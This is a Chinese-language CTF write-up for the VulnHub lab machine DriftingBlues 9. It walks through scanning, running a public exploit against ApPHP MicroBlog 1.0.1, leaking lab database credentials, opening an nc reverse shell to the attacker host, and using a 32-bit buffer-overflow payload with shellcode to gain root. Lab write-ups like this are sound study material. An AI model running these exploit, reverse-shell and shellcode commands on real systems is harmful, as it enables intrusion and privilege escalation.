靶机地址: https://www.vulnhub.com/entry/driftingblues-9-final,695/
1、主机探活
arp-scan -I eth0 -l (指定网卡扫) 扫描局域网所有设备(所有设备IP、MAC地址、制造商信息)
masscan 192.168.111.0/24 -p 80,22 (masscan 扫描的网段 -p 扫描端口号)
netdiscover -i eth0 -r 192.168.184.0/24 (netdiscover -i 网卡-r 网段)
nmap -sn 192.168.111.0/24
2、端口扫描
nmap -sS -A -sV -T4 -p- 192.168.111.22
80—http—Apache httpd 2.4.10 ((Debian))
111—rpcbind 2-4 (RPC #100000)
33809—(RPC #100024)
3、80端口分析
随便点点上面的东西发现了这玩意是ApPHP MicroBlog
然后在源代码的地方发现了其版本信息为v.1.0.1
4、漏洞利用
和第八个靶机一样,在kali的本地漏洞库搜索看看
芜湖,还真的有,直接尝试利用。先将脚本复制到当前目录,然后使用exp尝试攻击
1、searchsploit -m php/webapps/33070.py
2、python2 33070.py http://192.168.111.22/index.php
成功拿到了一个普通权限的shell
5、我们还看到了此exp竟然显示出了数据库配置文件信息,看到了一个用户
用户名: clapton
密码: yaraklitepe
此时思路如下:看看家目录有无此用户,有的话可以尝试登录 (这里还可以通过/etc/passwd文件中发现存在普通用户clapton)
ls /home
发现存在此用户,但是之前的端口扫描发现22端口未开放,那我们就直接切换用户
先反弹个shell到kali再进行切换用户操作
1、看看有无nc,有的话直接用nc -e反弹:which nc
2、kali开启监听:nc -lvnp 4444
3、使用nc反弹shell:nc -e /bin/bash 192.168.111.7 4444
4、成功获取到反弹shell后切换到交互式shell:python -c 'import pty;pty.spawn("/bin/bash")'
5、切换用户:su clapton
这里如果没有nc的话就用bash或者python去反弹shell
成功切换后,在 /home/clapton 目录下拿到 flag1
同时在当前目录发现 note.txt ,查看内容发现相关提示
buffer overflow is the way. ( ° ʖ °)
if you're new on 32bit bof then check these:
https://www.tenouk.com/Bufferoverflowc/Bufferoverflow6.html
https://samsclass.info/127/proj/lbuf1.htm
缓冲区溢出就是解决方法。( ° ʖ °)
如果您是32位转炉的新手,请检查以下内容:
https://www.tenouk.com/Bufferoverflowc/Bufferoverflow6.html
https://samsclass.info/127/proj/lbuf1.htm
所以提权的方法就是利用缓冲区溢出
6、尝试提权(这里pwn是我的知识盲区,没有学过。。。)
这里给出别的大佬wp,大家感兴趣去学习学习:
https://cn-sec.com/archives/757904.html
https://blog.csdn.net/qq_32261191/article/details/117908644
给出payload:
for a in {1..1000}; do (./input $(python -c 'print "A" * 171 + "\x80\x26\x83\xbf" + "\x90" * 2000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80" ')); done
拿到root权限,完结散花~
总结:
1、细心的做好信息收集,网站的一些链接、源代码等。
2、searchsploit 工具的用法
3、缓冲区漏洞提权
参考:
https://www.tenouk.com/Bufferoverflowc/Bufferoverflow6.html
https://samsclass.info/127/proj/lbuf1.htm
hirak0